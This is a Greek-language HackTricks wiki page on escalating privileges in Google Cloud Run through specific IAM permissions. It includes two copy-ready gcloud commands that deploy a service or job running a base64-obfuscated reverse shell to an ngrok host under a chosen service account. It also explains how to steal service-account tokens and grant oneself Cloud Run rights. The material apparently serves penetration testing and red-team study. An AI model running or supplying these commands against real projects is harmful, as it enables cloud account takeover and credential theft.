GCP - Run Privesc

Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks:

Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
Αποκτήστε το επίσημο PEASS & HackTricks swag
Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε με στο Twitter 🐦 @carlospolopm.
Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.

Cloud Run

Για περισσότερες πληροφορίες σχετικά με το Cloud Run, ελέγξτε:

`run.services.create` , `iam.serviceAccounts.actAs`, `run.routes.invoke`

Ένας επιτιθέμενος με αυτές τις άδειες μπορεί να δημιουργήσει ένα run service που εκτελεί αυθαίρετο κώδικα (αυθαίρετο Docker container), να συνδέσει έναν λογαριασμό υπηρεσίας σε αυτόν και να κάνει τον κώδικα να διαρρεύσει το διακριτικό του λογαριασμού υπηρεσίας από τα μεταδεδομένα.

Ένα script εκμετάλλευσης για αυτήν τη μέθοδο μπορεί να βρεθεί εδώ και η εικόνα Docker μπορεί να βρεθεί εδώ.

Σημειώστε ότι όταν χρησιμοποιείτε την εντολή gcloud run deploy αντί να δημιουργείτε απλώς την υπηρεσία, χρειάζεται την άδεια update. Ελέγξτε ένα παράδειγμα εδώ.

`run.services.update` , `iam.serviceAccounts.actAs`

Όπως και η προηγούμενη, αλλά ενημερώνοντας μια υπηρεσία:

gcloud run deploy hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

`run.services.setIamPolicy`

Δώστε στον εαυτό σας τα προηγούμενα δικαιώματα πάνω στο Cloud Run.

`run.jobs.create`, `run.jobs.run`, (`run.jobs.get`)

Ξεκινήστε μια διαδικασία με ένα αντίστροφο κέλυφος για να κλέψετε τον λογαριασμό υπηρεσίας που αναφέρεται στην εντολή. Μπορείτε να βρείτε ένα εκμεταλλευτή εδώ.

`run.jobs.update`,`run.jobs.run`,`iam.serviceaccounts.actAs`,(`run.jobs.get`)

Όμοια με το προηγούμενο, είναι δυνατόν να ενημερώσετε μια διαδικασία και να ενημερώσετε τον λογαριασμό υπηρεσίας, την εντολή και να την εκτελέσετε:

gcloud beta run jobs update hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--project=security-devbox --execute-now

`run.jobs.setIamPolicy`

Δώστε στον εαυτό σας τα προηγούμενα δικαιώματα για τα Cloud Jobs.

Αναφορές

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
Αποκτήστε το επίσημο PEASS & HackTricks swag
Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
Εγγραφείτε στη 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε με στο Twitter 🐦 @carlospolopm.
Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.

PreviousGCP - Resourcemanager Privesc NextGCP - Secretmanager Privesc

Last updated 3 months ago

Cloud Run

run.services.create , iam.serviceAccounts.actAs, run.routes.invoke

run.services.update , iam.serviceAccounts.actAs

run.services.setIamPolicy

run.jobs.create, run.jobs.run, (run.jobs.get)

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

run.jobs.setIamPolicy